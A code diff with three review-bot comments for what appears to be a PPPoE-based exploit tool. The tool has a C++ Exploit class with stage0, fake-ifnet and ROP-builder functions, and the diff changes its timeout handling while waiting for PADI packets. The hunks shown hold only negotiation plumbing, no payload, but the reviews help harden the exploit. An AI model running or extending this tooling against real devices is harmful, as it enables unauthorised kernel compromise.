diff --git a/include/exploit.h b/include/exploit.h
index fa38ffc..1c56287 100644
--- a/include/exploit.h
+++ b/include/exploit.h
@@ -100,7 +100,7 @@ class Exploit {
 int ipcp_negotiation() const;
 int ppp_negotiation(const std::function(Exploit *)> &cb = nullptr,
- bool ignore_initial_req = false);
+ bool ignore_initial_req = false, bool always_wait_padi = false);
 void ppp_byebye();
diff --git a/src/exploit.cpp b/src/exploit.cpp
index eb16c23..78e460f 100644
--- a/src/exploit.cpp
+++ b/src/exploit.cpp
@@ -330,13 +330,14 @@ int Exploit::ipcp_negotiation() const {
 return RETURN_SUCCESS;
 }
-int Exploit::ppp_negotiation(const std::function(Exploit *)> &cb, bool ignore_initial_req) {
+int Exploit::ppp_negotiation(const std::function(Exploit *)> &cb, bool ignore_initial_req,
+ bool always_wait_padi) {
 int padi_count = ignore_initial_req ? 2 : 1;
 Cookie pkt;
 while (padi_count--) {
 std::cout << "[*] Waiting for PADI..." << std::endl;
- dev->startCaptureBlockingMode(
+ if (dev->startCaptureBlockingMode(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet, pcpp::PPPoEDiscovery);
 auto *layer = PacketBuilder::getPPPoEDiscoveryLayer(parsedPacket,
@@ -344,9 +345,12 @@ int Exploit::ppp_negotiation(const std::function(Exploit *)
 if (!layer) return false;
 ((Cookie *) cookie)->packet = parsedPacket;
 return true;
- }, &pkt, 0);
+ }, &pkt, always_wait_padi ? 0 : this->timeout) != 1) {
+ return RETURN_FAIL;
+ } else if (!running) {
+ return RETURN_STOP;
+ }
 }
- CHECK_RUNNING();
 auto *pppoeDiscoveryLayer = pkt.packet.getLayerOfType();
 if (!pppoeDiscoveryLayer) {
@@ -695,7 +699,7 @@ std::vector Exploit::build_second_rop(Exploit *self) {
 }
 int Exploit::stage0() {
- CHECK_RET(this->ppp_negotiation(Exploit::build_fake_ifnet, this->wait_padi));
+ CHECK_RET(this->ppp_negotiation(Exploit::build_fake_ifnet, this->wait_padi, true));
 CHECK_RET(this->lcp_negotiation());
 CHECK_RET(this->ipcp_negotiation());
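Review bot: The new parameter defaults to `false` in the header, which silently changes the behavior of every existing caller that does not pass it: in the .cpp hunk the capture used to block with timeout 0 (wait indefinitely) and now blocks with `this->timeout` unless `always_wait_padi` is true. Only `stage0()` is updated in this diff, so any other caller outside the diff, if one exists, now gets a bounded wait and a new `RETURN_FAIL` path it did not have before; defaulting to `true` would preserve the old behavior, or the callers should be audited. The declaration also does not say what the flag means; a one-line comment such as `/// When true, block for a PADI with no timeout; otherwise give up after `timeout` and return RETURN_FAIL.` would make the contract visible at the call site.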
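Review bot: The `!= 1` check on the added line treats a capture timeout and a capture error the same way, returning `RETURN_FAIL` with no diagnostic for either, so the operator cannot tell a dead link from a missed packet. PcapPlusPlus's `startCaptureBlockingMode`, as far as I recall its contract, returns 1 when the callback stopped the capture, 0 on timeout and -1 on error, so storing the result and logging which case occurred is cheap, e.g. `int rc = dev->startCaptureBlockingMode(...);` followed by `if (rc != 1) { std::cout << (rc == 0 ? "[-] Timed out waiting for PADI" : "[-] Capture error") << std::endl; return RETURN_FAIL; }`. The `else` after that `return` is also redundant and can be dropped so `if (!running) return RETURN_STOP;` stands on its own. The enclosing `ppp_negotiation` body starts in the previous hunk and continues past this one.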
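Review bot: The bare `true` literal in the `ppp_negotiation` call reads as a magic boolean; nothing at the call site says it is `always_wait_padi`, and since it is the only visible caller it also means the timeout branch added in the .cpp hunk is never exercised from here. A trailing comment, `CHECK_RET(this->ppp_negotiation(Exploit::build_fake_ifnet, this->wait_padi, /*always_wait_padi=*/true));`, makes the intent explicit without changing behavior. The rest of `stage0()` continues past the hunk.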